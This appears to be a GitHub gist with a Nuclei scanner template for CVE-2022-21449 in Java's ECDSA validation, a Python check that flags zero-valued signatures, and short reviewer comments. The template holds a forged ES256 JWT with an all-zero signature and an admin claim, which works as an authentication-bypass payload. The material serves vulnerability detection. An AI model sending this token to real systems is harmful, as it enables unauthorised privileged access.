Last active
December 18, 2023 06:50
Nuclei template to detect exposure to CVE-2022-21449 by the JWT validation API in place.
```yaml
id: CVE-2022-21449

info:
  name: CVE-2022-21449 test exposure
  description: JDK 15-18 have a vulnerability in the validation of ECDSA signatures, so this template detects exposure to CVE-2022-21449 by the JWT validation API in place.
  author: righettod
  severity: info
  tags: cve,2022,java
  reference: https://neilmadden.blog/2022/04/19/psychic-signatures-in-java

requests:
  - raw:
      # Request 1: baseline without credentials; a protected endpoint answers 401 or 403.
      - |
        GET /?id={{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-store

      # Request 2: same endpoint with an ES256 JWT whose signature is the DER encoding of r=0, s=0.
      - |
        GET /?id={{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJSaWNrIEFzdGxleSIsImFkbWluIjp0cnVlLCJpYXQiOjE2NTA0NjY1MDIsImV4cCI6MTkwMDQ3MDEwMn0.MAYCAQACAQA
        Cache-Control: no-store

    # Evaluate the matcher across both responses (status_code_1, status_code_2).
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - '(status_code_1 == 403 || status_code_1 == 401) && status_code_2 == 200'
```
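The check that the template's second request relies on being absent, written as an added Python example (not part of the gist or of any JWT library): ECDSA verification requires r and s to lie in [1, n-1], and the token above carries r = s = 0. The function names are hypothetical, and the sketch handles ES256 only, accepting both the raw R||S encoding and the DER encoding used by the template's token.

```python
import base64
import json

# Order n of the NIST P-256 group, the curve behind ES256.
P256_N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
# Token from the template's second request; its signature is DER for r=0, s=0.
PAGE_TOKEN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJSaWNrIEFzdGxleSIsImFkbWluIjp0cnVlLCJpYXQiOjE2NTA0NjY1MDIsImV4cCI6MTkwMDQ3MDEwMn0"
              ".MAYCAQACAQA")

def b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def parse_der_pair(sig):
    """(r, s) from DER SEQUENCE{INTEGER, INTEGER}, else None; short-form lengths cover P-256."""
    if len(sig) < 8 or sig[0] != 0x30 or sig[1] != len(sig) - 2:
        return None
    values, pos = [], 2
    for _ in range(2):
        if pos + 2 > len(sig) or sig[pos] != 0x02:
            return None
        length = sig[pos + 1]
        end = pos + 2 + length
        if not 1 <= length <= 0x7F or end > len(sig):
            return None
        values.append(int.from_bytes(sig[pos + 2:end], "big"))  # read as unsigned
        pos = end
    return tuple(values) if pos == len(sig) else None

def classify_es256_jwt(token):
    """Return 'out-of-range', 'in-range', 'not-es256' or 'malformed'."""
    parts = token.split(".")
    try:
        header = json.loads(b64url_decode(parts[0]))
        sig = b64url_decode(parts[2])
    except (ValueError, IndexError):
        return "malformed"
    if len(parts) != 3 or not isinstance(header, dict):
        return "malformed"
    if header.get("alg") != "ES256":
        return "not-es256"
    # JWS defines raw R||S (64 bytes for ES256); the template's token carries DER.
    if len(sig) == 64:
        pair = (int.from_bytes(sig[:32], "big"), int.from_bytes(sig[32:], "big"))
    else:
        pair = parse_der_pair(sig)
    if pair is None:
        return "malformed"
    return "in-range" if all(1 <= v < P256_N for v in pair) else "out-of-range"
```

An `in-range` result only means the values pass the range check; the signature still has to be verified against the key. An `out-of-range` result on an inbound token is worth logging as a probe for this CVE.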
References:
- https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21449
- https://github.com/DataDog/security-labs-pocs/tree/main/proof-of-concept-exploits/jwt-null-signature-vulnerable-app
- https://token.dev/
- ticarpi/jwt_tool#65
- projectdiscovery/nuclei-templates#4216
Need to add some matcher, if not, there will be many false positives
Yes, you are 100% right. It was a first proposal and I will refactor it to decrease the probability of false positives.
@daffainfo I updated the template to try to decrease the probability of false positives:
looks so much better
Thank you.
Example of usage using this sample vulnerable application: